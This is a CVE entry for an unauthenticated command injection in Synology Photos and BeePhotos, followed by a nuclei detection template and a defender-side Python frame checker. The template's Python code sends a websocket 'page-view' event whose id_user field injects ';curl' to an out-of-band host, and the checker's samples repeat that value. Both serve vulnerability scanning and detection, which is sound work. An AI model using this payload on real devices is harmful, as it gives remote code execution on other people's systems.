Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
PoC code [published]
id: CVE-2024-10443

info:
  name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
  reference:
    - https://www.synology.com/en-us/security/advisory/Synology_SA_24_18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10443
    cwe-id: CWE-77
    epss-score: 0.69894
    epss-percentile: 0.98624
    cpe: cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: synology
    product: photos
    framework: diskstation_manager
    shodan-query: html:"BeeStation"
  tags: unauth,synology,rce,websocket,diskstation

variables:
  OAST: "{{interactsh-url}}"

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      import websocket,os,json # pip install websocket-client
      url = "ws://"+os.getenv('Hostname')+"/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
      ws = websocket.create_connection(url)
      initial = ws.recv()
      ws.send("40")
      response = ws.recv()
      payload = {
          "id_user": ";curl "+os.getenv('OAST')+";",
          "timestamp": 0,
          "location": "xxd"
      }
      event_message = f'42["page-view",{json.dumps(payload)}]'
      ws.send(event_message)
      ws.close()

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the out-of-band (DNS) interaction
        words:
          - "dns"
# digest: 4a0a0047304502200c520e0378568db2d7924f230807017beef1733f4f9d720642a47ceaf367ced00221009a3738866903e35ff9f1db4665839ee7e83b7bee716a06c186eeb0c499569b3f:922c64590222798bb761d5b6d8e72950
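Defender-side check, added here as an illustration and not part of the nuclei template or Synology's code: a Socket.IO frame inspector that parses the `42[...]` EVENT frames the PoC above sends and flags a `page-view` event whose `id_user` field carries shell metacharacters, which is what a proxy, IDS rule or the server-side handler should reject. The numeric-only `id_user` policy and the sample frames are assumptions.

```python
import json
import re

# Engine.IO v4 MESSAGE ("4") followed by Socket.IO EVENT ("2"), then a JSON
# array of [event_name, payload]. This is the framing the PoC uses.
EVENT_PREFIX = "42"

# Shell metacharacters that must never reach a command line (assumed policy).
SHELL_META = re.compile(r"[;&|`$<>\n\\]")

# Assumption: a legitimate id_user is a plain integer string.
SAFE_ID = re.compile(r"^[0-9]+$")


def parse_event(frame: str):
    """Return (event_name, payload) for a Socket.IO EVENT frame, else None."""
    if not frame.startswith(EVENT_PREFIX):
        return None
    try:
        body = json.loads(frame[len(EVENT_PREFIX):])
    except json.JSONDecodeError:
        return None
    if not isinstance(body, list) or len(body) < 2 or not isinstance(body[0], str):
        return None
    return body[0], body[1]


def check_frame(frame: str) -> dict:
    """Classify a frame as ignore (not an event), benign, or suspicious."""
    parsed = parse_event(frame)
    if parsed is None:
        return {"event": None, "verdict": "ignore"}
    event, payload = parsed
    if event != "page-view" or not isinstance(payload, dict):
        return {"event": event, "verdict": "benign"}
    id_user = str(payload.get("id_user", ""))
    if SHELL_META.search(id_user) or not SAFE_ID.match(id_user):
        return {"event": event, "verdict": "suspicious", "id_user": id_user}
    return {"event": event, "verdict": "benign", "id_user": id_user}


# Constructed sample frames, not captured traffic.
SAMPLE_FRAMES = [
    '40',
    '42["page-view",{"id_user":"1234","timestamp":0,"location":"album"}]',
    '42["page-view",{"id_user":";curl oast.example.invalid;","timestamp":0,"location":"xxd"}]',
    '42["ping",{}]',
]


def scan(frames):
    """Run check_frame over a list of frames and return the verdicts."""
    return [check_frame(f) for f in frames]
```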